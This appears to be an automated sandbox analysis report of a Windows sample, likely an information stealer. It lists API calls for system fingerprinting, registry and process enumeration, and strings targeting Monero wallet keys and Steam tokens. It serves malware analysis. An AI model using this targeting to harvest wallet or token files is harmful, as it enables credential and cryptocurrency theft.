GetCurrentProcessId.KERNEL32(00000000,?,0173D670,00000000,?,00C00E24,00000000,?,00000000,00000000,?,0173DFB8,00000000,?,00C00E20,00000000), ref: 00BF207E

Part of subcall function 00BF9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00BF9484
Part of subcall function 00BF9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00BF94A5
Part of subcall function 00BF9470: CloseHandle.KERNEL32(00000000), ref: 00BF94AF

Part of subcall function 00BF7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7E37
Part of subcall function 00BF7E00: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7E3E
Part of subcall function 00BF7E00: RegOpenKeyExA.KERNEL32(80000002,0172C2E0,00000000,00020119,?), ref: 00BF7E5E
Part of subcall function 00BF7E00: RegQueryValueExA.KERNEL32(?,0173D8F0,00000000,00000000,000000FF,000000FF), ref: 00BF7E7F
Part of subcall function 00BF7E00: RegCloseKey.ADVAPI32(?), ref: 00BF7E92

Part of subcall function 00BF7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00BF7FC9
Part of subcall function 00BF7F60: GetLastError.KERNEL32 ref: 00BF7FD8

Part of subcall function 00BF7ED0: GetSystemInfo.KERNEL32(00C00E2C), ref: 00BF7F00
Part of subcall function 00BF7ED0: wsprintfA.USER32 ref: 00BF7F16

Part of subcall function 00BF8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0173DF28,00000000,?,00C00E2C,00000000,?,00000000), ref: 00BF8130
Part of subcall function 00BF8100: RtlAllocateHeap.NTDLL(00000000), ref: 00BF8137
Part of subcall function 00BF8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BF8158
Part of subcall function 00BF8100: wsprintfA.USER32 ref: 00BF81AC

Part of subcall function 00BF87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E28,00000000,?), ref: 00BF882F
Part of subcall function 00BF87C0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF8836
Part of subcall function 00BF87C0: wsprintfA.USER32 ref: 00BF8850

Part of subcall function 00BF8320: RegOpenKeyExA.KERNEL32(00000000,0173B7B8,00000000,00020019,00000000,00C005B6), ref: 00BF83A4

Part of subcall function 00BF8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
Part of subcall function 00BF8320: wsprintfA.USER32 ref: 00BF8459
Part of subcall function 00BF8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
Part of subcall function 00BF8320: RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
Part of subcall function 00BF8320: RegCloseKey.ADVAPI32(00000000), ref: 00BF8499

Part of subcall function 00BF8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C005B7), ref: 00BF86CA
Part of subcall function 00BF8680: Process32First.KERNEL32(?,00000128), ref: 00BF86DE
Part of subcall function 00BF8680: Process32Next.KERNEL32(?,00000128), ref: 00BF86F3
Part of subcall function 00BF8680: CloseHandle.KERNEL32(?), ref: 00BF8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00BF265B

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: 1eb2baf6dc4dd122d9bfbda4323ae517cfe7b9aa8397e8b2800aa8fb890e2325
Instruction ID: 9fee0d1bf0e427677adf9ee1c31b8498a03cda09255340e656d8a062eb9142ee
Opcode Fuzzy Hash: 1eb2baf6dc4dd122d9bfbda4323ae517cfe7b9aa8397e8b2800aa8fb890e2325
Instruction Fuzzy Hash: B7724DB181011DAADB1DFB54DC91EFEB3B8AF14340F5482E9A21A73095EF702B4DCA65

Function 00BE6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a04a55749d17671d42a4baf453f4bf513f8d3309445614e1a720152117854f5
Instruction ID: 4f98c2e5fd7707354e9aa934c6040cf7525927be525ca3c723799ea5eb2be92d
Opcode Fuzzy Hash: 4a04a55749d17671d42a4baf453f4bf513f8d3309445614e1a720152117854f5
Instruction Fuzzy Hash: D56113B4900258EFCB14CF95E984BEEB7F0FB18344F1085A8E819A7281D775AE94DF91

Function 00BF70D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00BF718C

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: 5b5f30c6d17ecc3a276527b8ac0f9a302e6e9d7863858acd13392cce9908ab22
Instruction ID: 4e4fd8e8d00ddd531920d59ac35e3d19eb935eb364745d15c65e12304f907ce3
Opcode Fuzzy Hash: 5b5f30c6d17ecc3a276527b8ac0f9a302e6e9d7863858acd13392cce9908ab22
Instruction Fuzzy Hash: 175117B0D4421C9BDB24EB90DC85BFEB3B4AB54304F2041E8E61977182EF746A8CCB59

Function 00BF5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885

lstrlen.KERNEL32(00000000,00000000,00C00ACA), ref: 00BF512A

Strings

steam_tokens.txt, xrefs: 00BF513F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: ea1dd2c3f2cd4df1eaae1d16887dcf3d46260bec0e65505de4d33af414be5562
Instruction ID: f03ce4db69a4365bf30a0d3467df0ab1752cd2a0c4e1cf0234a52b495fbd13a2
Opcode Fuzzy Hash: ea1dd2c3f2cd4df1eaae1d16887dcf3d46260bec0e65505de4d33af414be5562
Instruction Fuzzy Hash: CAF0FBB191010C66CB18FBA4DC56DFD77BC9B54340F5041A8BA5A63492EF346A1DC7A2

Function 00BF7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00C00E2C), ref: 00BF7F00
wsprintfA.USER32 ref: 00BF7F16

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 7ac65aa61f561935e226bc71a9fc6f38eab95a56c90ba498337d1058ffe2234d
Instruction ID: 8d4cfa0546045fef7f1c47c062a87da83636284cafc4df6c116a72e569e770d0
Opcode Fuzzy Hash: 7ac65aa61f561935e226bc71a9fc6f38eab95a56c90ba498337d1058ffe2234d
Instruction Fuzzy Hash: 2DF062B1A44218EBC710CF85DC45FBAB7BCF744614F1006A9F515A3280D77559048BE5

Function 00BEB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

lstrlen.KERNEL32(00000000), ref: 00BEB9C2
lstrlen.KERNEL32(00000000), ref: 00BEB9D6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: c416878815b64805e4bb30804691eb539e225be9b3a9531a72c7ee5f970a3b6a
Instruction ID: bd7b5bfa7b565734c38021c70cd006861c533be441593eb3404a6132849452a8
Opcode Fuzzy Hash: c416878815b64805e4bb30804691eb539e225be9b3a9531a72c7ee5f970a3b6a
Instruction Fuzzy Hash: 42E1D3B291011C9BDB19EBA4CC52DFE73B8AF54340F4441A9F60A770A1EF746A4DCB62

Function 00BEAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

lstrlen.KERNEL32(00000000), ref: 00BEB16A
lstrlen.KERNEL32(00000000), ref: 00BEB17E

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
